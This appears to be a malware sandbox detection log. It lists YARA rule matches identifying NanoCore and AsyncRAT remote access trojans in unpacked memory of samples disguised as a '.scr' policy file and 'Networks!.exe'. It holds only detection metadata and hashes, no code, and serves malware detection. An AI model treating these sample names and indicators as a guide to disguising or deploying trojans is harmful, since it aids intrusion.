Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7730000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.0.airlineagancy.casacam.net 7076.exe.280000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.5980000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.43f7444.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7730000.15.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3289e68.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
